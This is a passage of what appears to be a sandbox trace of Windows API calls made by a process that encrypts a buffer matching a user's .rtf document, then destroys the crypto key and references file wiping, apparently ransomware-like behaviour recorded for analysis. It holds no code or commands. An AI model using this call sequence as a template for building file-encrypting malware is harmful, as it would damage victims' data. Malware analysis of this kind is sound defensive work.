wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.470] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.470] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.471] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x12790, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x127a0) returned 1 [0033.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.471] CharLowerBuffW (in: lpsz="byte[75681]", cchLength=0xb | out: lpsz="byte[75681]") returned 0xb [0033.471] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.472] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.472] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x96c6d0*, pdwDataLen=0x6ae220*=0x12790, dwBufLen=0x127a0 | out: pbData=0x96c6d0*, pdwDataLen=0x6ae220*=0x127a0) returned 1 [0033.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.473] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.473] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.473] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.473] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.474] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.474] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.474] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.474] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.474] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.483] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.483] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.483] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.484] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.484] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.484] CryptDestroyKey (hKey=0x7c2280) returned 1 [0033.485] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.485] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.485] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0033.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.485] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.485] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.485] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.489] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.489] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.489] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.489] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.489] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.489] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.489] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.489] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.489] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.489] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.489] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.489] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.490] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.490] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.490] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.490] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.490] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.490] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.490] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.491] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.492] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.492] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.492] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.492] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.492] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.492] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\fe6eMKi1FTxh0MxK.rtf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x19d8b490, ftLastWriteTime.dwHighDateTime=0x1d5b8ed, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x0, dwReserved1=0x777648, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 0x7c2240 [0033.492] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.492] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.492] CharLowerBuffW (in: lpsz="byte[75664]", cchLength=0xb | out: lpsz="byte[75664]") returned 0xb [0033.493] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.493] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.493] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.493] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.493] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.493] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 